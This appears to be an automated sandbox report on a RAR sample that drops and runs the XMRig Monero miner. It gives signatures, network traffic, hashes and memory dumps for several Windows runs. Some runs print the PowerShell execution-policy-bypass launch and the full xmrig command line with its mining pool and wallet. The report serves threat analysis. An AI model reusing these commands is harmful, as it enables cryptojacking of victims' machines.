Malware Analysis Report

2025-04-19 18:40

Sample ID 240526-qt2rmsgc9t
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags: xmrig, execution, miner
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK: Enterprise Matrix V15
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral2, behavioral6, behavioral7, behavioral9, behavioral19, behavioral10, behavioral16, behavioral1, behavioral14, behavioral27, behavioral13, behavioral21, behavioral32, behavioral3, behavioral4, behavioral5, behavioral18, behavioral20, behavioral26, behavioral29, behavioral30, behavioral12, behavioral23, behavioral24, behavioral28, behavioral11, behavioral15, behavioral22, behavioral25, behavioral8, behavioral17, behavioral31 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

xmrig

XMRig Miner payload

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-26 13:33

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:25

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/596-3-0x00007FFA85F83000-0x00007FFA85F84000-memory.dmp

memory/596-5-0x0000016E68EA0000-0x0000016E68EC2000-memory.dmp

memory/596-8-0x00007FFA85F80000-0x00007FFA8696C000-memory.dmp

memory/596-9-0x0000016E69060000-0x0000016E690D6000-memory.dmp

memory/596-18-0x00007FFA85F80000-0x00007FFA8696C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kanfmakg.0rc.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/596-25-0x00007FFA85F80000-0x00007FFA8696C000-memory.dmp

memory/596-48-0x0000016E691E0000-0x0000016E691F2000-memory.dmp

memory/596-61-0x0000016E69040000-0x0000016E6904A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2440-90-0x00000243D0DA0000-0x00000243D0DC0000-memory.dmp

memory/2440-91-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/596-93-0x00007FFA85F83000-0x00007FFA85F84000-memory.dmp

memory/2440-92-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/596-94-0x00007FFA85F80000-0x00007FFA8696C000-memory.dmp

memory/596-95-0x00007FFA85F80000-0x00007FFA8696C000-memory.dmp

memory/2440-96-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-97-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-98-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-99-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-100-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-101-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-102-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-103-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-104-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-105-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-106-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-107-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-108-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-109-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-110-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-111-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-112-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-113-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-114-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-115-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-116-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-117-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-118-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-119-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-120-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-121-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-122-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-123-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-124-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-125-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-126-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-127-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-128-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-129-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-130-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-131-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-132-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-133-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-134-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-135-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-136-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-137-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-138-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-139-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-140-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-141-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-142-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-143-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-144-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-145-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-146-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-147-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-148-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-149-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-150-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-151-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-152-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-153-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-154-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-155-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-156-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:27

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/600-0-0x00007FFFF2EF3000-0x00007FFFF2EF4000-memory.dmp

memory/600-5-0x000002105A5F0000-0x000002105A612000-memory.dmp

memory/600-6-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp

memory/600-11-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp

memory/600-10-0x000002105A7B0000-0x000002105A826000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ognhugff.c5l.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/600-29-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp

memory/600-52-0x000002105A790000-0x000002105A7A2000-memory.dmp

memory/600-65-0x000002105A770000-0x000002105A77A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3084-94-0x000001E118480000-0x000001E1184A0000-memory.dmp

memory/3084-95-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/600-97-0x00007FFFF2EF3000-0x00007FFFF2EF4000-memory.dmp

memory/3084-96-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/600-98-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp

memory/600-99-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp

memory/3084-100-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-101-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-102-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-103-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-104-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-105-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-106-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-107-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-108-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-109-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-110-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-111-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-112-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-113-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-114-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-115-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-116-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-117-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-118-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-119-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-120-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-121-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-122-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-123-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-124-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-125-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-126-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-127-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-128-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-129-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-130-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-131-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-132-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-133-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-134-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-135-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-136-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-137-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-138-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-139-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-140-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-141-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-142-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-143-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-144-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-145-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-146-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-147-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-148-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-149-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-150-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-151-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-152-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-153-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-154-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-155-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-156-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-157-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-158-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-159-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-160-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:28

Platform

win10v2004-20240426-en

Max time kernel

1790s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (63 identical rows)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

memory/2060-0-0x00007FFCB8943000-0x00007FFCB8945000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xydjy1zt.cam.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2060-7-0x000001D07C7B0000-0x000001D07C7D2000-memory.dmp

memory/2060-11-0x00007FFCB8940000-0x00007FFCB9401000-memory.dmp

memory/2060-12-0x00007FFCB8940000-0x00007FFCB9401000-memory.dmp

memory/2060-14-0x00007FFCB8940000-0x00007FFCB9401000-memory.dmp

memory/2060-15-0x000001D07C830000-0x000001D07C842000-memory.dmp

memory/2060-16-0x000001D07C800000-0x000001D07C80A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1564-47-0x000002087C1B0000-0x000002087C1D0000-memory.dmp

memory/2060-48-0x000001D07CD20000-0x000001D07CF3C000-memory.dmp

memory/1564-49-0x000002087DAF0000-0x000002087DB10000-memory.dmp

memory/1564-51-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/2060-53-0x00007FFCB8943000-0x00007FFCB8945000-memory.dmp

memory/1564-52-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/2060-54-0x00007FFCB8940000-0x00007FFCB9401000-memory.dmp

memory/1564-56-0x000002087DB30000-0x000002087DB50000-memory.dmp

memory/1564-55-0x000002087DB10000-0x000002087DB30000-memory.dmp

memory/1564-57-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/2060-58-0x00007FFCB8940000-0x00007FFCB9401000-memory.dmp

memory/1564-59-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-61-0x000002087DB30000-0x000002087DB50000-memory.dmp

memory/1564-60-0x000002087DB10000-0x000002087DB30000-memory.dmp

memory/1564-62-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-63-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-64-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-65-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-66-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-67-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-68-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-69-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-70-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-71-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-72-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-73-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-74-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-75-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-76-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-77-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-78-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-79-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-80-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-81-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-82-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-83-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-84-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-85-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-86-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-87-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-88-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-89-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-90-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-91-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-92-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-93-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-94-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-95-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-96-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-97-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-98-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-99-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-100-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-101-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

